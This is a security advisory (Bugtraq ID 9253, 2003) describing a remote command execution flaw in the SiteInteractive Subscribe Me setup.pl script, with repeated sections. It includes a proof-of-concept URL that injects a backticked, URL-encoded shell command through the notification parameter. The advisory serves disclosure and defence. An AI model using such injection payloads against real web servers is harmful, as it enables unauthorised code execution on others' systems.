SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution Vulnerability
BID:9253
Info
SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution Vulnerability
| Bugtraq ID: | 9253 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 18 2003 12:00AM |
| Updated: | Dec 18 2003 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to "Paul Craig" <[email protected]>. |
| Vulnerable: |
SiteInteractive Subscribe Me Pro SiteInteractive Subscribe Me Enterprise |
| Not Vulnerable: | |
Discussion
SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution Vulnerability
It has been reported that the SiteInteractive Subscribe Me setup.pl script lacks sufficient sanitization on user-supplied URI parameters; an attacker may invoke this script remotely and and by passing sufficient URI parameters may influence the setup script into creating a file. This file can then be invoked to have arbitrary Perl script executed in the context of the target webserver.
It has been reported that the SiteInteractive Subscribe Me setup.pl script lacks sufficient sanitization on user-supplied URI parameters; an attacker may invoke this script remotely and and by passing sufficient URI parameters may influence the setup script into creating a file. This file can then be invoked to have arbitrary Perl script executed in the context of the target webserver.
Exploit / POC
SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution Vulnerability
The following proof of concept has been supplied:
http://www.example.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh¬ific
ation="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`
%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.
The following proof of concept has been supplied:
http://www.example.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh¬ific
ation="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`
%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.
Solution / Fix
SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution Vulnerability
Solution:
The vendor has reported that an update to address this issue is pending release.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
The vendor has reported that an update to address this issue is pending release.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution Vulnerability
References:
References:
- SiteInteractive Subscribe Me Homepage (SiteInteractive )
- Subscribe Me Pro/Enterprise - Remote Code Execution via Backticked Perl Variable ("Paul Craig - Pimp Industries"
)